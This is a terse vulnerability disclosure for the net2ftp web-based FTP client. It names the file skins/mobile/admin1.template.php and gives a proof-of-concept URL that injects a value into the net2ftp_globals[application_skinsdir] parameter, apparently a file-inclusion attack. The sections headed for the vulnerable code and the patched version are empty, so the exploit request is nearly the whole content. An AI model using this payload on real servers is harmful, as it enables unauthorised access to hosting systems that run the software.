net2ftp is web based ftp client used by many web shared hosting //////////////////////////////////////////////////////////////////// Vuln is in file skins/mobile/admin1.template.php: /////////////////////////////////////////////////////////////////// Pathed Version: ////////////////////////////////////////////////////////////////// POC: http://server/skins/mobile/admin1.template.php?net2ftp_globals[application_skinsdir]=evilevilevil